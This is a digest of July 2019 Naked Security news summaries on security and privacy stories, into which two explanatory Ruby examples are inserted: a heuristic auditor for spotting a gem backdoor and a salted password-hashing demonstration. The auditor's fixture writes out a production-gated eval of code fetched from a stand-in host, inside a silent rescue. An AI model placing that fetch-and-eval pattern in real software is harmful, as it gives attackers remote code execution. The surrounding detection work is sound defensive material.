
July 10, 2019

Two zero days and 15 critical flaws fixed in July’s Patch Tuesday

By John E Dunn

Patch Tuesday this month offers fixes for a total of 77 vulnerabilities, of which 15 are marked critical, rounded out by two zero-day flaws just to make things interesting.

However, with an operating system estate as large as Microsoft’s these days, numbers don’t tell the whole story.

A good example of this is Microsoft’s Edge and Internet Explorer 11 browsers, which, including two overlaps, are patched for seven and six flaws respectively, all rated critical, and all remote code execution (RCE) flaws in the most vulnerable part of a browser, the web scripting engine.

It’s worth drawing attention to this because it’s easy to overlook the security of software bundled in Windows 10 which some users either use infrequently, or do not use at all.

As explained in previous coverage, this is particularly the case with IE 11, which many Windows 10 users don’t even realise is there but hangs around to maintain backwards compatibility. Compare that to Windows 10 64-bit version 1903, which earns only one critical, CVE-2019-1102.

Zero days

The two zero days are CVE-2019-0880 and CVE-2019-1132, both Elevation of Privilege (EoP) flaws currently being exploited in the wild by unnamed threat groups. The first affects the Windows splwow64 print spooler while the second is in Win32k.

Read more at https://nakedsecurity.sophos.com/2019/07/10/two-zero-days-and-15-critical-flaws-fixed-in-julys-patch-tuesday/

Rogue Android apps ignore your permissions

By Danny Bradbury

You know those Android dialogue boxes that pop up when you first run an app, asking you what permissions you want to give the software? They’re not as useful as we all thought.

New research has revealed that apps are snooping on data including location and the phone’s unique ID number – even when users haven’t given permission.

The research comes from researchers at the University of Calgary, U.C. Berkeley, the IMDEA Networks Institute, the International Computer Science Institute (ICSI) and AppCensus, which offers a searchable database detailing the privacy issues with individual apps. Titled 50 Ways to Leak Your Data: An Exploration of Apps’ Circumvention of the Android Permissions System, the paper identified dozens of apps circumventing permissions-based protections in Android to get the data they want.

Android apps must ask for permission to access sensitive resources on the phone, like the GPS, the camera, or the user’s contacts data. When you say that an app can’t access your location data, the operating system can prevent it from doing so because it runs the app in its own sandbox. That also stops the app in question from interacting with other apps.

Sidestepping permissions

The researchers analysed over 88,000 Android apps to see what data they transmitted from the phone, and where they sent it. They ran the test on a variety of Android systems, with the most recent being Android Pie (2018). They matched this against the permissions that the user had granted the app to see if apps were harvesting data that they shouldn’t be. They found dozens of apps transmitting data they shouldn’t have accessed, along with thousands more containing the code to do so. They reverse engineered the code and found two main methods for circumventing permissions protections.

Read more at https://nakedsecurity.sophos.com/2019/07/10/android-apps-sidestepping-permissions-to-access-sensitive-data/

Instagram asks bullies, ‘Are you sure you want to say that?’

By Lisa Vaas

Instagram on Monday announced that it’s now using artificial intelligence (AI) to detect speech that looks like bullying and that it will interrupt users before they post, asking if they might want to stop and think about it first.

The Facebook-owned platform, hugely popular with teens, also plans to soon test a new feature called “Restrict” that will enable users to hide comments from specific users without letting them know that they’ve been muted.

In the blog post, Instagram chief executive Adam Mosseri said the company “could do more” to stop bullying and help out its victims:

We can do more to prevent bullying from happening on Instagram, and we can do more to empower the targets of bullying to stand up for themselves.

These tools are grounded in a deep understanding of how people bully each other and how they respond to bullying on Instagram, but they’re only two steps on a longer path.

Think before you post

Instagram posted one example of what would-be bullies are going to see if its AI interprets their comments as offensive: a user who types “you are so ugly and stupid” gets interrupted with a notice saying: “Are you sure you want to post this? Learn more”.

If the user taps “learn more”, they get this notice: “We are asking people to rethink comments that seem similar to others that have been reported.”

Read more at https://nakedsecurity.sophos.com/2019/07/10/instagram-asks-bullies-are-you-sure-you-want-to-say-that/

Zoom flaw could force you into a meeting, expose your video feed

By Lisa Vaas

Zoom, a company that sells video conferencing software for the business market, is tweaking the app to fix a vulnerability in its software that allows malicious websites to force users into a Zoom call with the webcam turned on.

The flaw was discovered by security researcher Jonathan Leitschuh, who documented it in a blog post on Monday.

He said that initially, the vulnerability would have also allowed any webpage to inflict a denial of service (DoS) attack on a Mac by repeatedly forcing a user onto an invalid call. But that DoS vulnerability – CVE-2019-13449 – was fixed in version 4.4.2 of the macOS client.

In discussions with the Zoom team over the past few weeks, Leitschuh said that Zoom had proposed a fix to the hijacking vulnerability: namely, digitally signing requests from websites that are made to the client.

But the researcher said that wouldn’t have solved the problem, given that an attacker would be able to set up a server to make requests to the Zoom site in order to acquire a valid digital signature before contacting the client.

Note. The original version of this article stated that this flaw was specific to Zoom on the Mac, but Jonathan Leitschuh has confirmed in a tweet that this issue can affect Windows users too. See below for how to prevent Zoom turning on your camera by default when you join a meeting. [Updated 2019-07-09T18:20Z]

Read more at https://nakedsecurity.sophos.com/2019/07/09/zoom-flaw-could-force-mac-users-into-meetings-expose-video-feed/

Backdoor discovered in Ruby strong_password library

By John E Dunn

An eagle-eyed developer has discovered a backdoor recently sneaked into a library (or ‘gem’) used by Ruby on Rails (RoR) web apps to check password strength.

A close shave, then. While the Ruby scripting language and RoR aren’t as popular as they once were, they’re still embedded in numerous enterprise development environments, many of which might have used the default library, strong_password, in its infected version 0.0.7.

The discovery came about after Epion Health developer Tute Costa noticed something unusual when carefully updating a family of libraries used by his company’s development team to fix bugs and security vulnerabilities.

When he looked at the strong_password gem on RubyGems.org, he couldn’t locate a changelog explaining how it got to the updated version from 0.0.6, an event which happened on 25 June 2019.

The previous GitHub version had been updated in October 2018. Comparing the two versions, he noticed the mystery 0.0.7 version embedded a download link which:

Fetches and runs the code stored in a pastebin.com, only if running in production, with an empty exception handling that ignores any error it may raise.

The backdoor would download code from the Pastebin address on production sites, giving the attackers remote code execution and silently hijacking any website unfortunate enough to have updated to the rogue strong_password gem.
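The traits described above (a remote fetch feeding eval, gated on the production environment, wrapped in a rescue that swallows every error) are exactly what a reviewer can look for when a gem update arrives with no changelog. The following is an added example, not code from the strong_password gem, from Tute Costa or from Naked Security: a small heuristic auditor that flags those traits in Ruby source, plus a helper that audits only the lines a new version introduces over the old one. Both source strings are constructed for the example; the suspect one copies the shape the article describes but points at a non-resolving `example.invalid` host and is never executed.

```ruby
require 'set'

# Signals for the three traits the article attributes to the rogue gem.
REMOTE_FETCH = /\b(?:URI\.open|Net::HTTP|open\s*\(\s*['"]https?:)/
DYNAMIC_EVAL = /\b(?:eval|instance_eval|class_eval|module_eval)\s*\(/
PROD_GATE    = /\bRails\.env\.production\?|(?:RAILS_ENV|RACK_ENV)\W.*production/
# A `rescue` whose body holds only blank lines or comments before `end`,
# or the one-liner `rescue; end`: errors are discarded, nothing is logged.
EMPTY_RESCUE = /^[ \t]*rescue(?:[ \t]+[^\n;]*?)?[ \t]*(?:;|\n(?:[ \t]*(?:#[^\n]*)?\n)*)[ \t]*end\b/

# Audit a Ruby source string; returns 1-based line numbers per trait.
def audit_ruby_source(src)
  findings = { remote_fetch: [], dynamic_eval: [], production_gate: [], empty_rescue: [] }
  src.each_line.with_index(1) do |line, n|
    findings[:remote_fetch]    << n if line.match?(REMOTE_FETCH)
    findings[:dynamic_eval]    << n if line.match?(DYNAMIC_EVAL)
    findings[:production_gate] << n if line.match?(PROD_GATE)
  end
  # String#scan with a block sets $~ for each match; the line of the
  # `rescue` keyword is the number of newlines before the match plus one.
  src.scan(EMPTY_RESCUE) { findings[:empty_rescue] << Regexp.last_match.pre_match.count("\n") + 1 }
  findings
end

# Remote fetch plus dynamic evaluation in one file is the verdict that matters.
def suspicious?(findings)
  !findings[:remote_fetch].empty? && !findings[:dynamic_eval].empty?
end

# Audit only what a new version adds. Lines already present in the old
# version are blanked (keeping line numbers intact), except bare structural
# keywords, so an empty rescue block added around old code is still visible.
STRUCTURAL = Set.new(%w[begin rescue ensure else end])
def audit_gem_update(old_src, new_src)
  old_lines = Set.new(old_src.each_line.map(&:strip))
  only_new = new_src.each_line.map do |line|
    key = line.strip
    old_lines.include?(key) && !STRUCTURAL.include?(key) ? "\n" : line
  end.join
  audit_ruby_source(only_new)
end

# Constructed "previous version": a plausible password-strength helper.
CLEAN_SOURCE = <<~'RUBY'
  class StrongPassword
    MIN_ENTROPY = 18

    def self.strong?(password)
      password.length >= 8 && password.match?(/[^a-z]/i)
    end
  end
RUBY

# Constructed "updated version": same helper plus the described backdoor shape.
SUSPECT_SOURCE = <<~'RUBY'
  require 'open-uri'

  class StrongPassword
    MIN_ENTROPY = 18

    def self.strong?(password)
      password.length >= 8 && password.match?(/[^a-z]/i)
    end

    # constructed shape of the described backdoor; fetches nothing real
    def self.check
      return unless ENV['RAILS_ENV'] == 'production'
      begin
        eval(URI.open('https://example.invalid/payload').read)
      rescue
      end
    end
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  added = audit_gem_update(CLEAN_SOURCE, SUSPECT_SOURCE)
  added.each { |trait, lines| puts "#{trait}: lines #{lines.inspect}" }
  puts "verdict: #{suspicious?(added) ? 'REVIEW BEFORE INSTALLING' : 'no fetch-and-eval pattern'}"
end
```

The regexes are deliberately coarse: they are a triage aid for reading a diff, not a proof of safety, and a clean result says nothing about obfuscated code (`send(:eval, ...)`, string-built method names). The point of `audit_gem_update` is procedural: compare the packaged gem against the previous release rather than trusting the version bump, which is how the real backdoor was caught.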

Read more at https://nakedsecurity.sophos.com/2019/07/09/backdoor-discovered-in-ruby-strong_password-library/

July 9, 2019

Google suspends Trends emails after revealing murder suspect’s name

By Lisa Vaas

After violating a court suppression order and publishing a murder suspect’s name, Google has suspended its Trends alert emails in New Zealand.

In New Zealand, among other countries, the right to a fair trial includes a court’s being able to order people and organizations to refrain from publishing suspects’ names.

Google didn’t do that. It says it didn’t even mean to, but its Google Trends alerts went ahead and emailed out links to a media report that included the murder suspect’s name.

A few days after the December 2018 murder of British backpacker Grace Millane, Google had sent an email to anyone signed up for its “what’s trending in New Zealand” alert. After Google’s news-gathering algorithm picked up a British newspaper’s report of the suspect’s court appearance, it automatically forwarded the story to all subscribers, including the name of the accused killer in the subject line.

That action violated a suppression order prohibiting publication of the suspect’s name or identification details. Google’s violation sparked outrage in New Zealand, which, with its low serious-crime rate, had been shocked by the murder of the young tourist, believed to have been killed the night before her 22nd birthday.

According to a furious letter published by NZ Minister of Justice Andrew Little last week, when he met with Google representatives six months ago, Google said that the company took the issue seriously and that they’d look into what they could do to fix the problem.

Read more at https://nakedsecurity.sophos.com/2019/07/09/google-suspends-trends-emails-after-revealing-murder-suspects-name/

Firefox to include tracker blocking report feature

By Danny Bradbury

Mozilla has introduced a lot of tracker blocking protections into Firefox lately. Now, it is planning a new feature that will let you see how many online snoopers you’ve successfully evaded.

A new feature called the Tracking Protections Panel (aka the Protection Report) will tell users how many trackers Firefox blocked in the prior week, giving them a good sense of how well these protections are working.

To help understand why Mozilla is doing this, it’s worth looking at the tracker protections Firefox has recently added.

Mozilla released the full version of its Enhanced Tracking Protection (ETP) system in Firefox 67.0.1 in June. This introduced default blocking for cross-site trackers, which are the small pieces of code embedded in websites by advertising networks. They watch what you’re reading across the web to generate a profile of you.

Mozilla simultaneously released an updated version of its Facebook Container to stop the social media giant tracking people in a similar way. Those share and like buttons you see on various sites? They tell Facebook what you’re reading across the web – whether you click them or not. The updated container blocks those, along with all other connections to Facebook’s servers.

In May 2019, Firefox also introduced a feature to block any cryptomining scripts that the user comes across. These are JavaScript programs that use the browser’s host computer to mine for cryptocurrency (typically Monero). One or two are legit and ask the user’s permission. Most aren’t, and don’t.

Read more at https://nakedsecurity.sophos.com/2019/07/09/firefox-to-include-tracker-blocking-report-feature/

Apple aims privacy billboard at Google’s controversial smart-city

By Lisa Vaas

Some say that Apple’s strenuous Privacy-R-Us marketing campaign is hypocritical, but that’s not stopping it from continuing to troll Google over the issue.

In January 2019, it was the billboard it erected over Las Vegas during CES, blaring out that “what happens on your iPhone stays on your iPhone.”

The billboard depicted an iPhone and linked to apple.com/privacy: the spot where Apple proclaims that privacy is a “fundamental human right”.

It doesn’t gather and share your data, Apple promises, be it from taking a photo; asking Siri a question; getting directions; what your heart rate is after a run; what news stories you read; where you bought your last coffee; what websites you visit; or who you call, email, or message.

You can do it knowing that Apple doesn’t gather your personal information to sell to advertisers or other organizations.

Apple products are designed to protect your privacy – every Apple product is designed from the ground up to protect that information. And to empower you to choose what you share and with whom.

Quayside: prime site for privacy virtue signaling

But that billboard was then, and this is now: Apple has a new billboard and a far more specific target. This time, the company has erected a privacy billboard at the site of a developing “smart city” called Quayside. Some are calling the neighborhood, on Toronto’s eastern waterfront, a privacy dystopia in the making. It’s going to be sensor-thick, and it’s tangled up with the uber data-collecting Google: the developer is Sidewalk Labs, which is a subsidiary of Google’s parent company, Alphabet.

Read more at https://nakedsecurity.sophos.com/2019/07/09/apple-aims-privacy-billboard-at-googles-controversial-smart-city/

July 8, 2019

Researchers hack VR worlds

By Danny Bradbury

Hackers just infiltrated virtual reality (VR), enabling them to manipulate users’ immersive 3D worlds.

At the Recon cybersecurity show in Montreal, researchers Alex Radocea and Philip Pettersson demonstrated how to hack virtual reality worlds on three platforms.

  • The first was VR Chat, a virtual chat room available via online gaming platform Steam and Facebook-owned Oculus.
  • The second was Steam’s own Steam VR platform, which provides games designed for VR and also allows users to play traditional games on a giant virtual screen.
  • Finally, High Fidelity, an open source VR system with its own blockchain-based digital currency, got the hacking treatment.

Hacking an immersive VR world enables an attacker to take complete control of the victim’s virtual world, Radocea and Pettersson warned. An attacker can listen to what the victim is saying, and can also create fake images.

What kinds of real-world attacks could someone engineer in a VR world? In the hacking demonstration, the researchers opened the Calc.exe Windows program, which is a common way to demonstrate that you can run arbitrary code on a system. In most demonstrations, this would just appear on the desktop, but in this case, it replaced one of the VR users’ hands like a giant sticky note that they couldn’t get rid of.

Read more at https://nakedsecurity.sophos.com/2019/07/08/researchers-hack-vr-worlds/

Privacy and security risks as Sign In with Apple tweaks Open ID protocol

By Lisa Vaas

To many, it sounded like a good idea when Apple announced its Sign In with Apple service at WWDC 2019 last month: a privacy-focused login feature that will let macOS Catalina and iOS 13 users sign into third-party apps and websites using their Apple IDs.

It’s a service that’s designed to rival those of the data-gobbling behemoths, Google, Twitter and Facebook, each of which has its own no-no-how-about-you-sign-in-with-ME authentication service. All of these services allow you to use your ID for a quick, one-click sign-up or sign-on, no password required, as long as you’re signed into whatever tech bigwig’s service you’re using.

But on 27 June 2019, Apple’s implementation of a sign-in service that doesn’t send personal information to app and website developers was critiqued by the OpenID Foundation (OIDF), the standard-setting organization behind the OpenID open standard and decentralized authentication protocol. The non-profit organization includes tech heavyweights such as Google, Microsoft, PayPal, and others.

The OIDF published an open letter to Apple software chief Craig Federighi, lauding the company for having “largely adopted” OpenID Connect into Sign In with Apple. OpenID Connect is a standardized protocol used by many existing sign-in platforms that lets developers authenticate users across websites and apps without them having to use separate passwords.

Read more at https://nakedsecurity.sophos.com/2019/07/08/privacy-and-security-risks-as-sign-in-with-apple-tweaks-open-id-protocol/

ISPs call Mozilla ‘Internet Villain’ for promoting DNS privacy

By John E Dunn

The UK Internet Service Providers Association (ISPA) has provocatively shortlisted Mozilla for the sort of award that, on the face of it at least, no tech company should be keen to win – ‘2019’s Internet Villain’.

Mozilla’s claim to infamy? From ISPA’s point of view, it’s Firefox’s imminent inclusion of DNS over HTTPS (DoH) – a technology many experts endorse as the biggest jump for internet privacy since the expansion of HTTPS itself.

The problem, according to the ISPA press release, is that the arrival of this technology in the Firefox browser used by millions will make it possible to:

Bypass UK filtering obligations and parental controls, undermining internet safety standards in the UK.

The point of DoH (and the related DNS over TLS, or DoT) is to encrypt DNS requests, which makes it impossible, or at least very difficult, for entities such as ISPs or governments to monitor which websites people are visiting. And because the DNS requests are sent inside encrypted HTTPS requests, they’re also indistinguishable from other web traffic, so they can’t be blocked without blocking all web traffic.

To privacy enthusiasts, this is good because neither ISPs nor governments have any business knowing which domains users happen to frequent.

For ISPs, by contrast, DoH hands them several headaches, including how to fulfil their legal obligation in the UK to store a year’s worth of each subscriber’s internet visits in case the government wants to study them later for evidence of criminal activity.

Read more at https://nakedsecurity.sophos.com/2019/07/08/isps-call-mozilla-internet-villain-for-promoting-dns-privacy/

New Year’s eve gaming DDoSer lulz himself into a 27-month sentence

By Lisa Vaas

Back in 2014, an entity calling itself @DerpTrolling was one of a bunch of squabbling steamrollers that just about pancaked the gaming world with multiple distributed denial-of-service (DDoS) attacks before, during and after New Year’s Eve.

At the time, @DerpTrolling called itself a group of hackers and, in a chat with the YouTube gaming channel #DramaAlert, said that he/she/they simply attacked sites based on requests from people who tweeted suggested targets.

In other words, it was all just a game, and it was all for the lulz.

In November 2018, one of the “gang” of hackers – possibly the only one – behind the @DerpTrolling moniker got busted. Austin Thompson, a 23-year-old from the US state of Utah, pleaded guilty on 6 November 2018 in a San Diego federal court to knowingly causing damage to third-party computers.

There’s no lulzing now: on Tuesday, Thompson was sentenced in federal court to 27 months in prison for carrying out a series of DDoSes against multiple victims between 2013 and 2014.

Read more at https://nakedsecurity.sophos.com/2019/07/08/new-years-eve-gaming-ddoser-lulz-himself-into-a-27-month-sentence/

5 tips to stay secure on social media

By Paul Ducklin

Here at Naked Security, we’re well aware that social networks aren’t for everyone, and if you’ve decided to stay away from them, we’re good with that.

After all, the best way to prevent privacy blunders and data breaches is simply not to give out the data in the first place – or, if you’re a vendor, not to pressurise people into sharing things that they don’t need to give you and that you’ll probably never use anyway.

But we’re not killjoys, either.

We enjoy spending time on social media – it’s a fun and effective way to keep in contact with our followers and to spread the word about cybersecurity without relying entirely on written articles.

We think you can be part of the social media scene and yet keep enough of your life and lifestyle private that you end up enjoying the benefits without being squashed by the risks…

…but you do need to follow some simple guidelines, both to protect yourself from online rogues, and to stop those same online rogues abusing your account to attack your friends.

Anyway, last weekend was #SocialMediaDay, which was meant to be a way to celebrate all the cool things that social networks let you do, but NOT a call to throw all caution to the winds and start sharing everything with everyone!

Read more at https://nakedsecurity.sophos.com/2019/07/05/5-tips-to-stay-secure-on-social-media/

OpenPGP experts targeted by long-feared ‘poisoning’ attack

By John E Dunn

Somebody out there has taken a big dislike to Robert J. Hansen (‘rjh’) and Daniel Kahn Gillmor (‘dkg’), two well-regarded experts in the specialized world of OpenPGP email encryption.

It’s not known who launched the attacks in late June 2019 (Hansen says he has suspects in mind), but it’s the nature of the campaign against them that has people in this corner of encryption worried – a “poisoning” attack against their personal certificate signatures held on the OpenPGP Synchronizing Key Server (SKS) network.

It sounds arcane, but the effects of this on the sizeable number of people using implementations of the OpenPGP protocol – GnuPG, Sequoia-PGP, OpenPGP.js – are, to varying degrees, potentially very serious. Daniel Kahn Gillmor blogged last week:

My public cryptographic identity has been spammed to the point where it is unusable in standard workflows.

The most disconcerting thing about these attacks is how easy they were to launch, simply by spamming large numbers of fake certificate signatures to the keyservers, effectively burying the genuine signatures on the two men’s certificates under thousands of bogus additions.

This sort of attack has been feared for a decade, with smaller attacks recorded a year ago fulfilling that prediction. What’s novel this time, however, is the scale and highly targeted nature of the campaign. As Hansen sums it up in his own reaction:

To have my own certificate directly spammed in this way felt surprisingly personal, as though someone was trying to attack or punish me, specifically.

And it really is a flood – comprising 55,000 fakes directed at Daniel Kahn Gillmor and twice that number at Hansen. This causes problems (see below) but what matters is that the pair now fear the attack will be used against others, expanding its scope in ways that will be very hard to counter.

Read more at https://nakedsecurity.sophos.com/2019/07/05/openpgp-experts-targeted-by-long-feared-poisoning-attack/

July 3, 2019

IoT vendor Orvibo gives away treasure trove of user and device data

By Danny Bradbury

Two billion items of log data from devices sold by China-based smart IoT device manufacturer Orvibo were found by researchers at web privacy review service vpnMentor, who discovered the data in an exposed Elasticsearch server online.

Orvibo has been selling products for smart homes, businesses, and hotels since 2011, ranging from HVAC systems through to home security, energy management, and entertainment systems. The back-end database appears to have been logging system events from lots of them.

Researchers Noam Rotem and Ran Locar found logs from Orvibo devices in China, Japan, Thailand, the US, the UK, Mexico, France, Australia, and Brazil, vpnMentor said in its report.

This data provides insights into the lives of Orvibo’s customers, creating potential security risks, it warned.

With over 2 billion records to search through, there was enough information to put together several threads and create a full picture of a user’s identity.

The logs discovered by the vpnMentor team contained various pieces of personal information, including email addresses, usernames, user IDs, and passwords. Orvibo’s developers had used the notoriously insecure MD5 hashing mechanism to protect the passwords. It had also failed to use a salt, which is a random string combined with the password that makes hashed passwords far more difficult to recover.
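To make the two failings concrete (a fast, unsalted hash, and no per-user salt), here is an added example, not code from Orvibo or from vpnMentor’s report. It builds a small constructed account table, shows what an unsalted MD5 column gives away to anyone holding the dump (password reuse is visible as identical hashes, and common passwords resolve against a precomputed list without any cracking effort), and then stores the same passwords with a random per-user salt and PBKDF2-HMAC-SHA256 from Ruby’s standard `openssl` library. The iteration count and the `alg$iterations$salt$digest` storage format are this example’s own choices, not anything from the article.

```ruby
require 'digest'
require 'openssl'
require 'securerandom'

# Constructed sample accounts; two of them reuse the same weak password.
ACCOUNTS = [
  ['alice@example.invalid', 'password123'],
  ['bob@example.invalid',   'password123'],
  ['carol@example.invalid', 'Tr0ub4dor&3'],
].freeze

# Constructed stand-in for a precomputed table of common passwords.
COMMON_PASSWORDS = %w[123456 password password123 qwerty letmein].freeze

# The weak scheme described in the article: one fast hash, no salt.
def md5_unsalted(password)
  Digest::MD5.hexdigest(password)
end

# What a leaked unsalted table reveals: hashes of common passwords can be
# looked up directly, and identical hashes expose users who share a password.
def weaknesses_of_unsalted(accounts, wordlist)
  table = accounts.map { |email, pw| [email, md5_unsalted(pw)] }
  lookup = wordlist.each_with_object({}) { |w, h| h[md5_unsalted(w)] = w }
  recovered = table.map { |email, hash| [email, lookup[hash]] if lookup[hash] }.compact
  reuse_groups = table.group_by { |_, hash| hash }.values
                      .select { |group| group.size > 1 }
                      .map { |group| group.map(&:first) }
  { recovered: recovered, reuse_groups: reuse_groups }
end

# Salted, slow alternative. Work factor is an assumption for the example;
# tune it to the hardware so a verification costs tens of milliseconds.
ITERATIONS = 100_000
KEY_LEN = 32

def hash_password(password, salt = SecureRandom.random_bytes(16))
  digest = OpenSSL::PKCS5.pbkdf2_hmac(password, salt, ITERATIONS, KEY_LEN, 'sha256')
  "pbkdf2-sha256$#{ITERATIONS}$#{[salt].pack('m0')}$#{[digest].pack('m0')}"
end

# Constant-time byte comparison so a verifier does not leak how many leading
# bytes of the digest matched.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def verify_password(stored, candidate)
  _alg, iters, salt_b64, digest_b64 = stored.split('$')
  salt = salt_b64.unpack1('m0')
  expected = digest_b64.unpack1('m0')
  actual = OpenSSL::PKCS5.pbkdf2_hmac(candidate, salt, iters.to_i, expected.bytesize, 'sha256')
  secure_equal?(actual, expected)
end

# With a per-user salt the two identical passwords no longer share a digest,
# the precomputed table is useless, and verification still works.
def salted_properties(accounts)
  stored = accounts.map { |email, pw| [email, hash_password(pw)] }
  digests = stored.map { |_, s| s.split('$').last }
  {
    all_distinct: digests.uniq.size == digests.size,
    verify_ok: stored.all? { |email, s| verify_password(s, accounts.assoc(email)[1]) },
    wrong_rejected: stored.none? { |_, s| verify_password(s, 'not-the-password') },
  }
end

if __FILE__ == $PROGRAM_NAME
  puts "unsalted MD5: #{weaknesses_of_unsalted(ACCOUNTS, COMMON_PASSWORDS).inspect}"
  puts "salted PBKDF2: #{salted_properties(ACCOUNTS).inspect}"
end
```

The salt is stored in the clear alongside the digest; that is intended, since its job is only to make each hash unique and defeat precomputation, while the iteration count supplies the cost per guess. A purpose-built password hash (bcrypt, scrypt or Argon2) is the usual production choice; PBKDF2 is used here because it ships with Ruby and needs no gem.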

The log data also included codes required for users to reset their accounts. The company said:

With this code accessible in the data, you could easily lock a user out of their account, since you don’t need access to their email to reset the password.

The code enables people to reset their email addresses too, meaning that an attacker could deny a user any chance of regaining their passwords.

Read more at https://nakedsecurity.sophos.com/2019/07/03/iot-vendor-orvibo-gives-away-treasure-trove-of-user-and-device-data/

Georgia’s court system hit by ransomware

By Lisa Vaas

Georgia’s court system has been hit with what may be the fourth Ryuk ransomware strike against state and local agencies in the past month and a half.

At the time of publishing this article, the site was still down.

According to Atlanta’s Channel 11 News, officials confirmed on Monday that at least part of the court system’s network had been knocked offline by a ransomware attack.

Details about the extent of the damage haven’t been publicly disclosed, but officials say it’s much less severe than the attack against Atlanta that destroyed years of police dashcam video last year, as well as freezing systems. Six days after it was hit, Atlanta was still rescheduling court dates, police and other employees were still writing out reports by hand, and residents couldn’t go online to pay their water bills or parking tickets.

The earlier attack against Atlanta involved SamSam ransomware – a high-profile ransomware that was typically used in targeted attacks where attackers break into a victim’s network and launch ransomware manually, to cause maximum damage and disruption.

The crooks demanded what was then roughly $52,000 worth of bitcoin. That paled in comparison to the $2.6 million worth of emergency contracts the city initiated to claw back its systems, and to the six-figure ransoms demanded in similar targeted attacks by other gangs.

The nature of this latest attack on Georgia’s court system hasn’t yet been determined. Authorities said the extortionists’ note didn’t specify a ransom amount or any other demands. Although the attack doesn’t appear to be as crippling as the SamSam one from last year, they took the court network offline to stay on the safe side, authorities said.

While few details were available as of Tuesday afternoon, there’s a hint that the Georgia assault might involve Ryuk ransomware.

Read more at https://nakedsecurity.sophos.com/2019/07/03/georgias-court-system-hit-by-ransomware/

Miami police body cam videos up for sale on the darkweb

By Lisa Vaas

This can’t be a good day for Miami police.

We’ve known for a while that many webcams are a security train wreck, and that doesn’t change just because a police officer straps one on.

Now, unsurprisingly, police body cam footage has been found sloshing around online.

It’s not just that about a terabyte of videos from Miami Police Department body cams was leaked and stored in unprotected, internet-facing databases, according to the security outfit that found them. It’s that they were leaked and then sold, according to Jason Tate, CEO of Black Alchemy Solutions Group, who told The Register that his team had found the footage listed for sale on the darkweb.

Tate first tweeted about the discovery on Saturday, including a sample video, which has since been removed.

Tate said that the data is coming from five different cloud service providers. Besides Miami Police, there’s video leaking from city police departments “all over the US”, he said.

It seems these 5 providers have city contracts all over.

Read more at https://nakedsecurity.sophos.com/2019/07/03/miami-police-body-cam-videos-up-for-sale-on-the-darkweb/

Patch Android! July 2019 update fixes 9 critical flaws

By John E Dunn

Depending on when users receive it, this week’s Android July 2019 patch update will fix 33 security vulnerabilities, including 9 marked critical, and 24 marked high.

If you own a Google Pixel device, that will be within a day or two, leaving everybody else on the 2019-07-01 and 2019-07-05 patch levels (what these dates mean is explained here) running Android 7, 8 or 9 to wait anything from weeks to months to catch up.

As usual, July’s batch of fixes covers flaws in significant parts of Android, including system, framework, library, and Qualcomm’s numerous components, including closed-source software.

However, as has been the case for some months, it’s the media framework that provides a disproportionate amount of the patching action in the form of three remote code execution (RCE) bugs marked critical.

These are CVE-2019-2107, CVE-2019-2106 (affecting Android 7 and 8), and CVE-2019-2109 (which only affects Android 9).

Another RCE critical is CVE-2019-2111 in the Android system, with the remaining critical flaws all connected to Qualcomm’s closed-source components.

Read more at https://nakedsecurity.sophos.com/2019/07/03/patch-android-july-2019-update-fixes-9-critical-flaws/

July 2, 2019

Scary Granny zombie game slurps credentials, spawns phishing attack

By Danny Bradbury

Halloween came a little early for some Android users this year after a horror-themed computer game was found stealing their account credentials and displaying potentially malicious ads.

Researchers at mobile security company Wandera found the game, called Scary Granny ZOMBYE Mod: The Horror Game 2019, doing sneaky things behind the scenes. Upon installation, it tries to get the user to pay £18 (about $22) for the game, and then connects to an ad network that appears to spam the user’s device with commercials for other malicious games. Finally, it tries to phish the user’s Google account.

The game, apparently based on another highly successful Android game called Granny, releases a phishing attack against the target device, displaying a notification that asks the user to update their Google Security services. When the unwitting user agrees, it presents a fake login page to slurp their credentials.

For those who took the bait, the phishing code uses a browser built into the app to access the user’s account and downloads their recovery emails and phone numbers, their cookies and tokens (which could give the attackers access to third-party apps) and their verification codes. Wandera explained:

We could see the user information including cookies and session identifier being gathered and shipped off to the attacker without the user knowing. This is a proof point that this attack goes beyond typical credential theft that usually happens via social engineering.

The researchers also discovered code that seemed to attempt the same phishing technique with Facebook credentials, although they didn’t see that part of the program in action.

Read more at https://nakedsecurity.sophos.com/2019/07/02/scary-granny-android-game-slurps-users-data/

Dating app Jack’d fined $240K for leaving private photos up for a year

By Lisa Vaas

A $240,000 fine has been imposed on Online Buddies, the company behind gay/bi/trans/curious dating app Jack’d – for leaving users’ private, often nude, photos up for grabs for a year.

“Only you can see your private pictures until you unlock them for someone else,” Jack’d promised, even after a researcher found that that was far from true. In fact, anyone with a web browser who knew where to look could access any Jack’d user’s photos, be they private or public – all without authentication or even the need to sign in to the app.

The Office of New York Attorney General Letitia James on Friday announced the settlement, handed down for:

Failure to protect private photos of users of its ‘Jack’d’ dating application … and the nude images of approximately 1,900 users in the gay, bisexual, and transgender community.

From the announcement:

Although the company represented to users that it had security measures in place to safeguard users’ information, and that certain photos would be marked ‘private,’ the company failed to implement reasonable protections to keep those photos private, and continued to leave security vulnerabilities unfixed for a year after being alerted to the problem.

The Attorney General’s office said in its release that Jack’d – a dating app that claims to have hundreds of thousands of active users worldwide and which markets itself as a tool to help men in the LGBTQIA+ community to hook up and date – “explicitly and implicitly” assures users that its private pictures feature can be used to exchange nude images securely and privately.

Read more at https://nakedsecurity.sophos.com/2019/07/02/dating-app-jackd-fined-240k-for-leaving-private-photos-up-for-a-year/

Medtronic rushes to replace insulin pumps after flaws found

By John E Dunn

Note. Naked Security cannot provide medical advice nor answer questions about specific Medtronic devices. If you’re concerned please contact your health professional or Medtronic directly on (US) 855-275-2717.

US medical equipment giant Medtronic has announced the immediate recall of all MiniMed 508 and Paradigm series insulin pumps after researchers uncovered serious security flaws which can’t be patched.

The news emerged last week when the company started sending recall letters to all US users of the device, a warning echoed by a public alert issued by the US Food and Drug Administration (FDA).

According to the FDA, Medtronic has identified around 4,000 US patients using affected models although an unknown number of others (including patients in other countries) will have received them through third parties.

This is still a relatively small number, which is perhaps explained by the fact that both pumps are older models dating back to 2012 that were withdrawn from sale in October 2018.

The pumps

The job of a pump is to deliver insulin to a patient throughout the day via a catheter implanted under the skin, which removes the need for regular injections to maintain stable blood glucose levels.

However, to do this, the pumps need to connect to a separate continuous glucose monitor (CGM) sensor which for a decade or so has been implemented wirelessly using Bluetooth.

